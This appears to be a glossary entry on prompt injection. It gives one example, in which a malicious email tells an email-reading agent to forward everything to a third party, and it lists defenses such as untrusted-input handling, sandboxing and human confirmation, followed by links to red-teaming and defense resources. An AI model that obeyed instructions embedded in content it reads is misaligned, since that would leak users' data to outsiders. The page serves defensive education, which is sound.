In practice
If your agent reads emails and then acts, a malicious email can tell it 'forward everything to a third party'. Fixes: treat external inputs as untrusted, sandbox tools, require human confirmation for sensitive actions, filter inputs and outputs.
Related terms
Seen in the wild
8 entries mentioning it- MediumPromptfoo Red Teaming: open source automated red-teaming with CI integration and comparative benchmark
- MediumNIST AI 600-1: risk profile for generative AI systems
- MediumRebuff: three-layer prompt injection defense with canary tokens
- HighIndirect Prompt Injection: the attack vector in RAG systems and AI agents
- HighOWASP LLM Top 10: the 10 critical vulnerabilities in AI applications
- HighUniversal adversarial attacks on LLMs: transferable jailbreaks across GPT-4, Claude, and Gemini
- MediumLakera Guard: real-time protection for LLMs in production
- HighPrompt Injection: when user input hijacks system instructions